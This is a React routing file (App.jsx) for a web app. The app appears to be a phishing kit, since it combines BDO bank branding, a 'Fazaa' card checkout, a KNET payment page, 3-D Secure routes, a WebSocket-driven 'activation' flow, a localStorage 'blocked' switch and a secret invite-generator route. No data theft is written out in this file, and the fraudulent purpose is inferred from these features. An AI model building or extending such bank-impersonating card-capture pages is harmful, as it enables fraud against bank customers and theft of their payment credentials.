// App.jsx
import React, { Suspense, lazy, useEffect, useState } from "react";
import { BrowserRouter as Router, Routes, Route, Outlet, Navigate, useLocation } from "react-router-dom";

import { PromoProvider } from "./providers/Init";
import ScrollToTop from "./providers/ScrollToTop";
import ThreeDSRoutes from "./providers/3ds/ThreeDSRoutes";
import { StepProvider } from "./StepContext";
import { motion } from "framer-motion";
import { CardProvider } from "./Utils/CardContext";

// NEW
import { GeoLayoutProvider, GEO_CODES } from "./providers/GeoContext";

/* ---- Lazy-loaded pages/components ---- */
const Header = lazy(() => import("./Header"));
const Footer = lazy(() => import("./Footer"));
const SelectLanding = lazy(() => import("./Pages/SelectLanding/Landing"));

const FazaaCardCheckout = lazy(() => import("./FazaaCardCheckout"));
const FazaaLanding = lazy(() => import("./Landing"));
const FazaaTerms = lazy(() => import("./Terms"));
const ActivationSuccessPage = lazy(() => import("./ActivationSucess"));

const FazaaFAQ = lazy(() => import("./FAQ"));
const AboutUs = lazy(() => import("./AboutUs"));
const PrivacyPolicy = lazy(() => import("./Privacy"));
const CustomerSupport = lazy(() => import("./Support"));

const Chat = lazy(() => import("./Chat/Chat"));
const ChatSupport = lazy(() => import("./Chat/ChatSupport"));

const Knet = lazy(() => import("./Knet/Knet"));
const ActivationSequence = lazy(() => import("./Pages/ActivationSequence/ActivationSequence"));
const InviteGenerator = lazy(() => import("./Pages/ActivationSequence/InviteGeneration"));

const WebSocketLazy = lazy(() => import("./providers/Websocket"));

function FooterLayout() {
  return (
    <>
      <Outlet />
      <Suspense fallback={null}>
        <Footer />
      </Suspense>
    </>
  );
}

function TopBannerLayout() {
  return (
    <>
      <div className="relative">
        <img src="/bdo-logo-dark.png" className="object-contain h-9 absolute top-4 left-4 z-10" alt="BDO" />
        <img src="/creo.png" alt="Banner" className="w-full max-h-64 object-cover" loading="lazy" decoding="async" />
      </div>
      <Outlet />
    </>
  );
}

function Loader() {
  return (
    <motion.div
      className="absolute inset-0 flex flex-col gap-y-4 items-center justify-center bg-[#0038A8] z-50"
      initial={{ opacity: 1 }}
      exit={{ opacity: 0, transition: { duration: 0.5 } }}
    >
      <img
        src="/bdo-logo-dark.png"
        alt="BDO We find ways"
        className="h-10 w-auto object-contain select-none"
      />
      <div className="w-6 h-6 border-2 border-t-transparent border-[#FDB913] rounded-full animate-spin" />
    </motion.div>
  );
}

// Redirect "/" to the last used geo (or "kw")
function RootRedirect() {
  const saved = (localStorage.getItem("geo") || "").toLowerCase();
  const g = GEO_CODES.includes(saved) ? saved : "ph";
  return <Navigate to={`/${g}`} replace />;
}

function App() {
  const [activationActive, setActivationActive] = useState(false);
  const blocked =
    typeof window !== "undefined" && localStorage.getItem("blocked") === "true";
  const [mountSocket, setMountSocket] = useState(false);

  useEffect(() => {
    if (blocked) return;
    const id = window.requestIdleCallback
      ? window.requestIdleCallback(() => setMountSocket(true))
      : setTimeout(() => setMountSocket(true), 1);

    return () => {
      if (window.cancelIdleCallback && typeof id === "number") {
        window.cancelIdleCallback(id);
      } else {
        clearTimeout(id);
      }
    };
  }, [blocked]);

  if (blocked) return null;

  return (
    <div className="App">
      <CardProvider>
        <StepProvider initialStep={0} persistKey="wizardStep">
          <PromoProvider>
            <Router>
              <ScrollToTop />

              {mountSocket && (
                <Suspense fallback={null}>
                  <WebSocketLazy setActivationActive={setActivationActive} />
                </Suspense>
              )}

              <Suspense fallback={<Loader />}>
                <Routes>
                  {/* 1) Root -> redirect to /{geo} */}
                  <Route path="/" element={<RootRedirect />} />

                  {/* 2) All geo-scoped routes */}
                  <Route
                    path="/:geo"
                    element={
                      <GeoLayoutProvider>
                        <Outlet />
                      </GeoLayoutProvider>
                    }
                  >
                    {/* Routes that share a Footer */}
                    <Route element={<FooterLayout />}>
                      {/* index -> "/:geo" */}
                      {/* <Route index element={<FazaaLanding />} /> */}
                      <Route index element={<SelectLanding />} />

                      {/* Pages with the same top banner + footer */}
                      <Route element={<TopBannerLayout />}>
                        <Route path="faq" element={<FazaaFAQ />} />
                        <Route path="privacy" element={<PrivacyPolicy />} />
                        <Route path="support" element={<CustomerSupport />} />
                        <Route path="about" element={<AboutUs />} />
                      </Route>

                      <Route path="final" element={<ActivationSuccessPage />} />
                      <Route path="terms" element={<FazaaTerms />} />
                      <Route path="activate" element={<ActivationSequence />} />
                      <Route
                        path="homepage"
                        element={
                          <div className="bg-[#E9E9E9]">
                            <Header />
                            <FazaaCardCheckout
                              activationActive={activationActive}
                              setActivationActive={setActivationActive}
                            />
                          </div>
                        }
                      />
                    </Route>

                    {/* Standalone (no footer) but still geo-scoped */}
                    <Route path="knet" element={<Knet />} />
                    <Route path="chat" element={<Chat />} />
                    <Route path="chatsupport" element={<ChatSupport />} />

                    {/* Secret invite, you can keep it under geo too */}
                    <Route path="N7k3X2pV9a1Q5mZ4" element={<InviteGenerator />} />
                  </Route>

                  {/* 3) 3DS: keep absolute routes as-is if your helper returns them */}
                  {ThreeDSRoutes()}
                </Routes>
              </Suspense>
            </Router>
          </PromoProvider>
        </StepProvider>
      </CardProvider>
    </div>
  );
}

export default App;
